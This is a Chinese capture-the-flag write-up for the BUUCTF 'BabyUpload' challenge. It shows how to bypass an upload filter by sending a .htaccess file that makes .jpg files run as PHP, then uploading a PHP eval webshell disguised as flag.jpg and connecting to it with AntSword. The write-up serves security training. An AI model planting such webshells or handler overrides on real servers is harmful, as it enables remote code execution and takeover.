BUUCTF-web刷题篇(17)

26.BabyUpload

源码:https://github.com/imaginiso/GXY_CTF/tree/master/Web/babyupload

查看题目源码:

写着:SetHandler application/x-httpd-php

通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性,倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码,这个是需要注意的。

.htaccess配置文件特性:

概述来说,.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

.htaccess配置文件格式

<FileMatch "xxx.jpg>

SetHandler application/x-httpd-php

创建.htaccess配置文件

SetHandler application/x-httpd-php

Kali或者主机创建txt文件输入上面的配置命令,并将其命名为111.jpg文件

上传.htaccess配置文件(111.jpg):

BP抓包:

这里猜测.htaccess文件被过滤,所以不能直接上传.htaccess配置文件,先截断数据包再把上传的111.jpg文件更名为.htaccess文件,如图:

action到repeater,并send,htaccess配置文件上传成功:

上传成功,现在我们的jpg一句话木马文件就可以上传并且可以当作php代码来执行了

创建木马文件

<script language='php'>@eval($_REQUEST['shell']);</script>

在Kali里面创建txt文件,输入以上代码,并将其保存命名为flag.jpg

上传木马文件

action到repeater中,send之后上传成功,访问上传路径链接:

http://b326957d-5245-4605-9d10-cf909d20a176.node5.buuoj.cn:81/upload/88a808fad157cecb392184390efb5967/flag.jpg

并未呈现图片格式,访问成功。

中国蚁剑连接:

连接成功后根目录后找到flag。

相关推荐
ZeroNews内网穿透29 分钟前
新版发布!“零讯”微信小程序版本更新
运维·服务器·网络·python·安全·微信小程序·小程序
撰卢3 小时前
网络安全期末大论文
安全·web安全
王哥儿聊AI8 小时前
Lynx:新一代个性化视频生成模型,单图即可生成视频,重新定义身份一致性与视觉质量
人工智能·算法·安全·机器学习·音视频·软件工程
Coovally AI模型快速验证10 小时前
从避障到实时建图:机器学习如何让无人机更智能、更安全、更实用(附微型机载演示示例)
人工智能·深度学习·神经网络·学习·安全·机器学习·无人机
Gobysec10 小时前
Goby 漏洞安全通告|Spring Cloud Gateway 信息泄露漏洞(CVE-2025-41243)
spring boot·安全·cve-2025-41243
趙卋傑11 小时前
项目发布部署
linux·服务器·后端·web
有点不太正常11 小时前
FlippedRAG——论文阅读
论文阅读·安全·大模型·rag
挨踢攻城13 小时前
Linux 安全 | 使用 iptables 测量流量
linux·服务器·安全·iptables·linux安全·厦门微思网络·测量流量
通信瓦工13 小时前
IEC 60598-1-2020灯具通用安全要求标准介绍
安全·灯具·标准下载
浅拾光º13 小时前
mysql字符串截取,如何在MySQL备份文件中安全截取敏感字符串?
数据库·mysql·安全